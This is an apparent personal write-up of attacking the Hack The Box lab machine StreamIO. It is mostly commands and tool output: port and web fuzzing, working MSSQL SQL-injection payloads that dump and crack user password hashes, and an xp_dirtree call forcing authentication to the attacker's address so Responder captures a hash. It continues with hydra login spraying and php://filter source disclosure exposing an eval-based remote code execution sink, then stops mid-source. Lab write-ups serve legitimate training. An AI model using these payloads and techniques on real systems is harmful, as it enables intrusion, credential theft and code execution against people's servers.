HTB StreamIO done
StreamIO¶
OS:¶
Windows
Technology:¶
IP Address:¶
10.10.11.158
Open ports:¶
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-03 20:34:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49726/tcp open msrpc Microsoft Windows RPC
Users and passwords:¶
Found on the website: https://streamio.htb/about.php
barry
oliver
samantha
---
From the users table in the database (MD5 hashes cracked with hashcat)
admin:paddpadd
Barry:$hadoW
Bruno:$monique$1991$
Clara:%$clara
Juliette:$3xybitch
Lauren:##123a8j8w5123##
Lenord:physics69i
Michelle:!?Love?!123
pentester:qwerty123
Sabrina:!!sabrina$
Thane:highschoolmusical
Victoria:!5psycho8!
yoshihide:66boysandgirls..
---
After trying the cracked credentials against the website login with hydra
L: yoshihide
P: 66boysandgirls..
---
After reading all the config files under C:\inetpub\*.php
db_admin
B1@hx31234567890
___
db_user
B1@hB1@hB1@h
---
From the backup database
nikk37
[email protected]
yoshihide
66boysandgirls..
Lauren
##123a8j8w5123##
Sabrina
!!sabrina$
---
From the Firefox profile databases
admin
JDg0dd1s@d0p3cr3@t0r
nikk37
n1kk1sd0p3t00
yoshihide
paddpadd@12
JDgodd
password@12
Nmap¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.158_nmap 10.10.11.158 ; cat 10.10.11.158_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-03 15:30 CEST
Nmap scan report for 10.10.11.158
Host is up (0.046s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-03 20:34:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_ssl-date: 2024-04-03T20:36:09+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after: 2022-03-24T07:03:28
|_http-title: Not Found
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49726/tcp open msrpc Microsoft Windows RPC
Add the hostnames to /etc/hosts¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat /etc/hosts | grep stream
10.10.11.158 streamIO.htb watch.streamIO.htb
ffuf - subdomains (vhost fuzzing via the Host header): https://10.10.11.158¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ ffuf -u https://10.10.11.158 -H "Host: FUZZ.streamio.htb " -w /usr/share/wordlists/dirb/big.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://10.10.11.158
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Header : Host: FUZZ.streamio.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
watch [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 54ms]
:: Progress: [20469/20469] :: Job [1/1] :: 131 req/sec :: Duration: [0:02:27] :: Errors: 0 ::
ffuf - https://streamio.htb¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ ffuf -u https://streamio.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o streamio.htb_443_ffuz -of all -e .php
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://streamio.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php
:: Output file : streamio.htb_443_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
ADMIN [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 51ms]
[INFO] Adding a new job to the queue: https://streamio.htb/ADMIN/FUZZ
Admin [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 49ms]
[INFO] Adding a new job to the queue: https://streamio.htb/Admin/FUZZ
About.php [Status: 200, Size: 7825, Words: 2228, Lines: 231, Duration: 50ms]
Contact.php [Status: 200, Size: 6434, Words: 2010, Lines: 206, Duration: 54ms]
Images [Status: 301, Size: 151, Words: 9, Lines: 2, Duration: 44ms]
[INFO] Adding a new job to the queue: https://streamio.htb/Images/FUZZ
Index.php [Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 45ms]
Login.php [Status: 200, Size: 4145, Words: 796, Lines: 111, Duration: 83ms]
about.php [Status: 200, Size: 7825, Words: 2228, Lines: 231, Duration: 42ms]
admin [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 41ms]
[INFO] Adding a new job to the queue: https://streamio.htb/admin/FUZZ
contact.php [Status: 200, Size: 6434, Words: 2010, Lines: 206, Duration: 59ms]
css [Status: 301, Size: 148, Words: 9, Lines: 2, Duration: 61ms]
[INFO] Adding a new job to the queue: https://streamio.htb/css/FUZZ
favicon.ico [Status: 200, Size: 1150, Words: 4, Lines: 1, Duration: 52ms]
fonts [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 39ms]
[INFO] Adding a new job to the queue: https://streamio.htb/fonts/FUZZ
images [Status: 301, Size: 151, Words: 9, Lines: 2, Duration: 50ms]
[INFO] Adding a new job to the queue: https://streamio.htb/images/FUZZ
index.php [Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 56ms]
js [Status: 301, Size: 147, Words: 9, Lines: 2, Duration: 74ms]
[INFO] Adding a new job to the queue: https://streamio.htb/js/FUZZ
login.php [Status: 200, Size: 4145, Words: 796, Lines: 111, Duration: 65ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 49ms]
register.php [Status: 200, Size: 4500, Words: 905, Lines: 121, Duration: 44ms]
[INFO] Starting queued job on target: https://streamio.htb/ADMIN/FUZZ
Images [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 46ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/ADMIN/Images/
Index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 53ms]
css [Status: 301, Size: 154, Words: 9, Lines: 2, Duration: 39ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/ADMIN/css/
fonts [Status: 301, Size: 156, Words: 9, Lines: 2, Duration: 38ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/ADMIN/fonts/
images [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 40ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/ADMIN/images/
index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 42ms]
js [Status: 301, Size: 153, Words: 9, Lines: 2, Duration: 41ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/ADMIN/js/
master.php [Status: 200, Size: 58, Words: 5, Lines: 2, Duration: 86ms]
[INFO] Starting queued job on target: https://streamio.htb/Admin/FUZZ
Images [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 60ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/Admin/Images/
Index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 60ms]
css [Status: 301, Size: 154, Words: 9, Lines: 2, Duration: 63ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/Admin/css/
fonts [Status: 301, Size: 156, Words: 9, Lines: 2, Duration: 55ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/Admin/fonts/
images [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 84ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/Admin/images/
index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 126ms]
js [Status: 301, Size: 153, Words: 9, Lines: 2, Duration: 126ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/Admin/js/
master.php [Status: 200, Size: 58, Words: 5, Lines: 2, Duration: 54ms]
[INFO] Starting queued job on target: https://streamio.htb/Images/FUZZ
[INFO] Starting queued job on target: https://streamio.htb/admin/FUZZ
Index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 53ms]
Images [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 54ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/admin/Images/
css [Status: 301, Size: 154, Words: 9, Lines: 2, Duration: 38ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/admin/css/
fonts [Status: 301, Size: 156, Words: 9, Lines: 2, Duration: 53ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/admin/fonts/
images [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 38ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/admin/images/
index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 43ms]
js [Status: 301, Size: 153, Words: 9, Lines: 2, Duration: 67ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/admin/js/
master.php [Status: 200, Size: 58, Words: 5, Lines: 2, Duration: 49ms]
[INFO] Starting queued job on target: https://streamio.htb/css/FUZZ
[INFO] Starting queued job on target: https://streamio.htb/fonts/FUZZ
[INFO] Starting queued job on target: https://streamio.htb/images/FUZZ
[INFO] Starting queued job on target: https://streamio.htb/js/FUZZ
:: Progress: [40938/40938] :: Job [9/9] :: 634 req/sec :: Duration: [0:01:21] :: Errors: 0 ::
Open website: https://streamio.htb/about.php¶
We found a list of users on the website: https://streamio.htb/about.php
Username:
barry
oliver
samantha
ffuf - https://watch.streamio.htb¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ ffuf -u https://watch.streamio.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o watch.streamio.htb_443_ffuz -of all -e .php
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://watch.streamio.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php
:: Output file : watch.streamio.htb_443_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
Index.php [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 192ms]
Search.php [Status: 200, Size: 253887, Words: 12366, Lines: 7194, Duration: 160ms]
blocked.php [Status: 200, Size: 677, Words: 28, Lines: 20, Duration: 74ms]
favicon.ico [Status: 200, Size: 1150, Words: 4, Lines: 1, Duration: 66ms]
index.php [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 66ms]
search.php [Status: 200, Size: 253887, Words: 12366, Lines: 7194, Duration: 135ms]
static [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 46ms]
[INFO] Adding a new job to the queue: https://watch.streamio.htb/static/FUZZ
[INFO] Starting queued job on target: https://watch.streamio.htb/static/FUZZ
css [Status: 301, Size: 161, Words: 9, Lines: 2, Duration: 240ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://watch.streamio.htb/static/css/
js [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 114ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://watch.streamio.htb/static/js/
:: Progress: [40938/40938] :: Job [2/2] :: 265 req/sec :: Duration: [0:02:54] :: Errors: 0 ::
Find path: https://streamio.htb/admin/¶
We found an admin folder: index.php answers "FORBIDDEN" (403) and master.php only returns a short 58-byte stub when requested directly
https://streamio.htb/admin/index.php
https://streamio.htb/admin/master.php
Find path: https://streamio.htb/login.php¶
Create a new user via https://streamio.htb/register.php
L: pentester
P: qwerty123
---
Log in with the new account at https://streamio.htb/login.php
but I got the message "Login failed"
SQLi: https://watch.streamio.htb/search.php¶
The search form's POST parameter q is injectable (MSSQL, UNION-based; the movies result set has six columns)
---
1 List all records
Payload: %' --
---
2 Confirm UNION works and find the column count (six columns)
Payload: abcd' union select 1,2,3,4,5,6 --
---
3 Get DB version
Payload: abcd' union select 1,@@version,3,4,5,6 --
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) Sep 24 2019 13:48:23 Copyright (C) 2019 Microsoft Corporation Express Edition (64-bit) on Windows Server 2019 Standard 10.0 (Build 17763: ) (Hypervisor)
---
4 Force SQL Server to authenticate to our SMB share with xp_dirtree and capture a NetNTLMv2 hash (rabbit hole)
Payload: abcd'; use master; exec xp_dirtree '\\10.10.14.6\fake_share' --
4.1 Run Responder and capture the hash (the connection comes back as the machine account DC$, i.e. the SQL Server service authenticates with the computer account)
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ responder -I tun0 -wv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[!] Responder must be run as root.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ sudo responder -I tun0 -wv
[sudo] password for kali:
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.6]
Responder IPv6 [dead:beef:2::1004]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-FE0QK1VXXSC]
Responder Domain Name [T6LK.LOCAL]
Responder DCE-RPC Port [48761]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.158
[SMB] NTLMv2-SSP Username : streamIO\DC$
[SMB] NTLMv2-SSP Hash : DC$::streamIO:059fb8f27d380514:E5A9095D415218B2E440ABADB2C29DC4:010100000000000080006B9A8F86DA014FD0BD88717275B90000000002000800540036004C004B0001001E00570049004E002D0046004500300051004B0031005600580058005300430004003400570049004E002D0046004500300051004B003100560058005800530043002E00540036004C004B002E004C004F00430041004C0003001400540036004C004B002E004C004F00430041004C0005001400540036004C004B002E004C004F00430041004C000700080080006B9A8F86DA01060004000200000008003000300000000000000000000000003000009A5046B50799D1BB42F017EC204919B296D4B1C408930C181749E844FB671B710A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0036000000000000000000
4.2 Cracking the hash (it does not crack: DC$ is the domain controller's machine account, whose password is a long random string that no wordlist contains)
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ hashcat -m 5600 streamio.hash /usr/share/wordlists/rockyou.txt -o streamio.hash_output
hashcat (v6.2.6) starting
...
...
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: DC$::streamIO:059fb8f27d380514:e5a9095d415218b2e440...000000
Time.Started.....: Thu Apr 4 13:00:52 2024 (9 secs)
Time.Estimated...: Thu Apr 4 13:01:01 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1665.3 kH/s (2.21ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[216361726f6c796e] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 69%
Started: Thu Apr 4 13:00:51 2024
Stopped: Thu Apr 4 13:01:04 2024
---
5 Enumerate the databases (master..sysdatabases)
Payload: abcd' union select 1,name,3,4,5,6 from master..sysdatabases --
master
model
msdb
STREAMIO
streamio_backup
tempdb
---
6 List the user tables (xtype='U') in STREAMIO, with their object ids
Payload: abcd' union select 1,name,id,4,5,6 from streamio..sysobjects where xtype='U' --
movies 885578193
users 901578250
---
7 List the columns of the users table (object id 901578250)
Payload: abcd' union select 1,name,id,4,5,6 from streamio..syscolumns where id in (901578250) --
id 901578250
is_staff 901578250
password 901578250
username 901578250
---
8 Dump usernames and password hashes (unsalted MD5, 32 hex chars) from users
Payload: abcd' union select 1,concat(username,':',password),3,4,5,6 from users --
admin :665a50ac9eaa781e4f7f04199db97a11
Alexendra :1c2b3d8270321140e5153f6637d3ee53
Austin :0049ac57646627b8d7aeaccf8b6a936f
Barbra :3961548825e3e21df5646cafe11c6c76
Barry :54c88b2dbd7b1a84012fabc1a4c73415
Baxter :22ee218331afd081b0dcd8115284bae3
Bruno :2a4e2cf22dd8fcb45adcb91be1e22ae8
Carmon :35394484d89fcfdb3c5e447fe749d213
Clara :ef8f3d30a856cf166fb8215aca93e9ff
Diablo :ec33265e5fc8c2f1b0c137bb7b3632b5
Garfield :8097cedd612cc37c29db152b6e9edbd3
Gloria :0cfaaaafb559f081df2befbe66686de0
James :c660060492d9edcaa8332d89c99c9239
Juliette :6dcd87740abb64edfa36d170f0d5450d
Lauren :08344b85b329d7efd611b7a7743e8a09
Lenord :ee0b8a0937abd60c2882eacb2f8dc49f
Lucifer :7df45a9e3de3863807c026ba48e55fb3
Michelle :b83439b16f844bd6ffe35c02fe21b3c0
Oliver :fd78db29173a5cf701bd69027cb9bf6b
pentester :3fc0a7acf087f549ac2b266baf94b8b1
Robert :f03b910e2bd0313a23fdd7575f34a694
Robin :dc332fb5576e9631c9dae83f194f8e70
Sabrina :f87d3c0d6c8fd686aacc6627f1f493a5
Samantha :083ffae904143c4796e464dac33c1f7d
Stan :384463526d288edcc95fc3701e523bc7
Thane :3577c47eb1e12c8ba021611e1280753c
Theodore :925e5408ecb67aea449373d668b7359e
Victor :bf55e15b119860a6e6b5a164377da719
Victoria :b22abb47a02b52d5dfa27fb0b534f693
William :d62be0dc82071bccc1322d64ec5b6c51
yoshihide :b779ba15cedfd22a023c4d8bcf5f2332
Cracking hashes¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat user_password_db.hahs
admin :665a50ac9eaa781e4f7f04199db97a11
Alexendra :1c2b3d8270321140e5153f6637d3ee53
Austin :0049ac57646627b8d7aeaccf8b6a936f
Barbra :3961548825e3e21df5646cafe11c6c76
Barry :54c88b2dbd7b1a84012fabc1a4c73415
Baxter :22ee218331afd081b0dcd8115284bae3
Bruno :2a4e2cf22dd8fcb45adcb91be1e22ae8
Carmon :35394484d89fcfdb3c5e447fe749d213
Clara :ef8f3d30a856cf166fb8215aca93e9ff
Diablo :ec33265e5fc8c2f1b0c137bb7b3632b5
Garfield :8097cedd612cc37c29db152b6e9edbd3
Gloria :0cfaaaafb559f081df2befbe66686de0
James :c660060492d9edcaa8332d89c99c9239
Juliette :6dcd87740abb64edfa36d170f0d5450d
Lauren :08344b85b329d7efd611b7a7743e8a09
Lenord :ee0b8a0937abd60c2882eacb2f8dc49f
Lucifer :7df45a9e3de3863807c026ba48e55fb3
Michelle :b83439b16f844bd6ffe35c02fe21b3c0
Oliver :fd78db29173a5cf701bd69027cb9bf6b
pentester :3fc0a7acf087f549ac2b266baf94b8b1
Robert :f03b910e2bd0313a23fdd7575f34a694
Robin :dc332fb5576e9631c9dae83f194f8e70
Sabrina :f87d3c0d6c8fd686aacc6627f1f493a5
Samantha :083ffae904143c4796e464dac33c1f7d
Stan :384463526d288edcc95fc3701e523bc7
Thane :3577c47eb1e12c8ba021611e1280753c
Theodore :925e5408ecb67aea449373d668b7359e
Victor :bf55e15b119860a6e6b5a164377da719
Victoria :b22abb47a02b52d5dfa27fb0b534f693
William :d62be0dc82071bccc1322d64ec5b6c51
yoshihide :b779ba15cedfd22a023c4d8bcf5f2332
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ hashcat user_password_db.hahs /usr/share/wordlists/rockyou.txt --user -m 0 --show
admin :665a50ac9eaa781e4f7f04199db97a11:paddpadd
Barry :54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
Bruno :2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
Clara :ef8f3d30a856cf166fb8215aca93e9ff:%$clara
Juliette :6dcd87740abb64edfa36d170f0d5450d:$3xybitch
Lauren :08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Lenord :ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
Michelle :b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
pentester :3fc0a7acf087f549ac2b266baf94b8b1:qwerty123
Sabrina :f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Thane :3577c47eb1e12c8ba021611e1280753c:highschoolmusical
Victoria :b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
yoshihide :b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
Hydra - try the cracked credentials against the website login¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ hashcat user_password_db.hahs /usr/share/wordlists/rockyou.txt --user -m 0 --show | tee user_password_db.hash_output
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat user_password_db.hash_output | cut -d: -f1,3 | tr -d " " | tee user_password_db.hash_output_hydra
admin:paddpadd
Barry:$hadoW
Bruno:$monique$1991$
Clara:%$clara
Juliette:$3xybitch
Lauren:##123a8j8w5123##
Lenord:physics69i
Michelle:!?Love?!123
pentester:qwerty123
Sabrina:!!sabrina$
Thane:highschoolmusical
Victoria:!5psycho8!
yoshihide:66boysandgirls..
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ hydra -C user_password_db.hash_output_hydra streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=failed"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 14:32:30
[DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries, ~1 try per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:F=failed
[443][http-post-form] host: streamio.htb login: yoshihide password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-04 14:32:33
Login to website: https://streamio.htb/login.php¶
L: yoshihide
P: 66boysandgirls..
https://streamio.htb/login.php
---
Now https://streamio.htb/admin/ opens for yoshihide
We see a basic admin panel
Find a new parameter: "debug"¶
Brute-force the GET parameter name with wfuzz, using yoshihide's session cookie; --hh 1678 hides responses with the same size as the unchanged admin page
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ wfuzz -u https://streamio.htb/admin/?FUZZ= -H "Cookie: PHPSESSID=sarnm1o7pdvrh50o5tu03rheqe" -w /usr/share/wordlists/dirb/big.txt --hh 1678
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/admin/?FUZZ=
Total requests: 20469
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000005859: 200 49 L 137 W 1712 Ch "debug"
000012076: 200 10790 L 25878 W 320235 Ch "movie"
000017111: 200 398 L 916 W 12484 Ch "staff"
000018833: 200 86 L 214 W 2815 Ch "user"
Total time: 0
Processed Requests: 20469
Filtered Requests: 20465
Requests/sec.: 0
---
The debug parameter includes whatever page name we pass, e.g. index.php or master.php:
https://streamio.htb/admin/?debug=master.php
Read master.php via php://filter¶
Including master.php directly just executes it, so use the php://filter wrapper to get its source back base64-encoded instead
Payload: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php
___
---
Decode the base64
The interesting part is at the bottom: if a POST parameter "include" is present and is not exactly "index.php", master.php runs eval(file_get_contents($_POST['include'])). file_get_contents also accepts URLs, so the "file" can be fetched from our own web server and its contents are executed as PHP code: remote code execution
___
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat master.php_php_filtr| base64 -d | tee master.php_php_filtr_decoded
base64: invalid input
<h1>Movie managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
if(isset($_POST['movie_id']))
{
$query = "delete from movies where id = ".$_POST['movie_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST" action="?movie=">
<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
$query = "select * from users where is_staff = 1 ";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
if(isset($_POST['staff_id']))
{
?>
<div class="alert alert-success"> Message sent to administrator</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['username']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST">
<input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
if(isset($_POST['user_id']))
{
